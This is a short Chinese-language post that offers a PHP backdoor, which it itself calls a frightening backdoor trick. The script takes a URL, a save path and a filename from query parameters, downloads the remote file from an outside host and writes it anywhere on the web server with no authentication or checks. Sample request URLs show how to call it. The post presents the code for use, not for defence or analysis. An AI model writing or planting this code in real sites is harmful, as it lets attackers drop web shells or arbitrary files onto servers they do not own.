可以实现网站A访问php文件+特定参数网址 将指定b网站上的文件 下载生成到A网站指定的目录上 非常可怕的后门技巧代码
一个简单的 PHP 代码示例:
<?php
// 后台上传:pass.123.txt
function download_file() {
$url = isset($_GET['url']) ? $_GET['url'] : '';
$save_path = isset($_GET['save_path']) ? $_GET['save_path'] : dirname(__FILE__).'/';
$filename = isset($_GET['filename']) ? $_GET['filename'] : 'downloaded_file.txt';
if ($url == '') {
return "需要提供?url=xxx.com 的文件。";
}
// 保存文件
try {
$content = file_get_contents($url);
file_put_contents($save_path . $filename, $content);
return "成功下载到:{$save_path}{$filename}";
} catch (\Exception $e) {
return "下载错误: " . $e->getMessage();
}
}
// 访问示例:index.php?act=download&url=url
if (isset($_GET['act']) && $_GET['act'] == 'download') {
echo download_file();
}
?>使用方式:
访问路径:
PHPindex.php?act=download&url=xxx.com/file.txt
自定义保存路径和文件名:
保存到当前目录下:
TEXTindex.php?act=download&url=xxx.com/file.txt
指定保存路径:
TEXTindex.php?act=download&url=xxx.com/file.txt&save_path=/data/backups/
指定文件名:
TEXTindex.php?act=download&url=xxx.com/file.txt&filename=backup_1234.txt
同时指定路径和文件名:
TEXTindex.php?act=download&url=xxx.com/file.txt&save_path=/data/backups/&filename=backups_5678.txt
返回结果:
成功下载后会显示保存的路径和文件名,例如:TEXT成功下载到:/var/www/data/backups/backups_1234.txt
